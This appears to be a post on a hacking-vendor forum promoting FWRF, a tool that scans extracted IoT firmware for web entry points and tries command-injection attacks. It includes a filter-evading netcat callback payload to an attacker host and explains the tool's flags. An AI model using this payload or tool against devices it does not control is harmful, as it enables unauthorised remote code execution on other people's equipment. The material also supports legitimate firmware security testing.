• ✨Always Use Forum Private Messages PM For Deal With Vendors✨

    Admin Contacts Jabber: megiddo@jabber.sk Telegram: @Megiddo1

RCE Finder

✨ DeeZNuTz

✨ Master ✨
Staff member
Joined
May 15, 2017
Messages
983
Likes
759
Points
1,045
FWRF (don't try to pronounce it) is a open source tool for firmware web-side analysis.

Why FWRF?

Due to some stupids minds, the new trend is to put computers in everything. This poc was initially written for testing some wifi antennas firmware.
The only common element between linux-embedded stuff with web interface is the front side (html/js), the rest can be PHP (ubiquiti), ELF (netgear), some_new_hype_technology... Doesn't matter.
The Goal of FWRF is to find entrypoints, vulnerabilities and try to autosploit them.

How ?

FWRF is composed of 4 parts:
  • File scan : Scan all files in extracted-firmware direcctory
  • Entrypoint scan : extracts urls with args, forms, etc.
  • Check rce : try basic code execution via thoses parameters
  • Test server : Start a test server for manual search
Rce checking
  • A server is started attacker-side (listening to port 10020) and waiting for a tcp packet.
  • the payload sent to {insert here a hype-connected-device name} is echo\t1|nc\tattacker_ip\t10020
  • in case of a dumb code (ex: exec("/bin/do_stuff --foobar $parameter") with controlled parameter, the packet is sent to attacker and FWRF know the attack success.
How to start
Usage

Firmware web rce finder

optional arguments:

-h, --help show this help message and exit
-s, --server run test server only for manual tests
-f BASE_FOLDER, --folder BASE_FOLDER
base folder of the extracted firmware
-r REMOTE_ADDRESS, --remote REMOTE_ADDRESS
Address of live machine (like 192.168.0.1)
-l LOCAL_ADDRESS, --local LOCAL_ADDRESS
Address of this machine (like 192.168.0.1)
-c COOKIES, --cookies COOKIES
Use cookies for authenticated parts
-v, --verbose Verbose mode

  • -s : start the test server, waiting for a tcp packet on port 10020
  • -f : path to the extracted firmware partition
  • -r : remote connected-stuff ip
  • -l : attacker ip (used in payload generation)
  • -c : cookies, if remote interface need authentication ("foo=bar&baz=gu")
  • -v : show more stuff
No magic exploitation

FWRF is not magic, it will only trigger obvious rce. But if you want to search further, it can help. First, use -f and -v parameters, the full list of entry points, parameters and http method is returned. Then, start the test server and search by yourself using the provided payload (or anything sending tcp packet on 10020).
 
Top Bottom